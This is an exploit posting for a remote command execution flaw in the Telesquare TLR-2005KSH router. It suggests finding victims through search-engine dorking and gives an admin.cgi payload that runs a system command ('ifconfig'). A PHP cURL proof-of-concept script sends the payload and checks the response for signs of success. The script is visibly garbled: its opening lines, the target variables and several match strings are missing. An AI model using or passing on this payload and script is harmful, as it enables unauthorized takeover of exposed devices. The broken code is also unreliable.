============================================================================================================================================= | # Title : Telesquare TLR-2005KSH - Remote Command Execution vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : http://telesquare.co.kr/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Telesquare TLR-2005KSH Automated Control Vulnerability [+] Payload : [+] Set Target : line 5 + 7 . [+] Usage : php poc.php [+] PayLoad : /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig"; $headers = [ "Host: ", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET"); $response = curl_exec($ch); curl_close($ch); if (strpos($response, '') !== false && strpos($response, '') !== false && strpos($response, 'Ethernet') !== false && strpos($response, 'inet') !== false) { echo "The vulnerability was successfully exploited.\n"; } else { echo "No exploitation of the vulnerability was detected.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================